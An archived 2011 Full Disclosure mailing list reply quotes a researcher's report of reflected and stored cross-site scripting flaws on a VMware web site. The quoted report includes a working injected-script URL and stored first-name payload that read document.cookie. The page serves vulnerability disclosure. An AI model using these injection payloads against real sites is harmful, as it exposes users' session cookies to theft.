Full Disclosure mailing list archives
Re: Vmware Web-Site Persistence and Non-Persistence Cross-Site Scripting
From: xD 0x41 <secn3t () gmail com>
Date: Sun, 9 Oct 2011 06:58:07 +1100
nice find. Please, put your FULL PoC within the email BODY when you are sending out disclosures..It would make some of us certainly feel abit better about reading them... specially when gmaqil refuses or has problems scanning, that should not happen, it should pass straight through... do your own testing, send from anywhere to gmail/googlemail and watch what the AV scannner says 9and believe me they have a very cool scanner)... On 8 October 2011 16:42, asish agarwalla <asishagarwalla () gmail com> wrote:
*Non-**Persistence/**Reflected Cross-Site Scripting* http://alliances.vmware.com/public_html/catalog/searchResult.php?isServicesProduct=no&isEntireCatalogSearch=yes&lastOnMenu=sub1,sub4&searchKey= "/><script>alert(document.cookie)</script>&category=all&isVmwareReadySelected=no *Persistence Cross-Site Scripting* Create a account in VMWARE. Insert First Name as : test "/>><script>alert(document.cookie)</script>., Inserted script stored as first name. Login to vmware, Select Login to as Manage Orders, Inserted script get executed. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Vmware Web-Site Persistence and Non-Persistence Cross-Site Scripting asish agarwalla (Oct 07)
- Re: Vmware Web-Site Persistence and Non-Persistence Cross-Site Scripting asish agarwalla (Oct 07)
- Re: Vmware Web-Site Persistence and Non-Persistence Cross-Site Scripting asish agarwalla (Oct 08)
- Re: Vmware Web-Site Persistence and Non-Persistence Cross-Site Scripting xD 0x41 (Oct 08)
- Facebook/google+ Cross-Site Content Forgery exploit Laurelai (Oct 08)
- Re: Facebook/google+ Cross-Site Content Forgery exploit Antony widmal (Oct 09)
- Re: Facebook/google+ Cross-Site Content Forgery exploit Laurelai (Oct 09)
- Re: Facebook/google+ Cross-Site Content Forgery exploit Valdis . Kletnieks (Oct 09)
- Re: Facebook/google+ Cross-Site Content Forgery exploit Laurelai (Oct 09)
- Re: Facebook/google+ Cross-Site Content Forgery exploit Valdis . Kletnieks (Oct 09)
- Re: Facebook/google+ Cross-Site Content Forgery exploit Laurelai (Oct 09)
- Re: Vmware Web-Site Persistence and Non-Persistence Cross-Site Scripting xD 0x41 (Oct 08)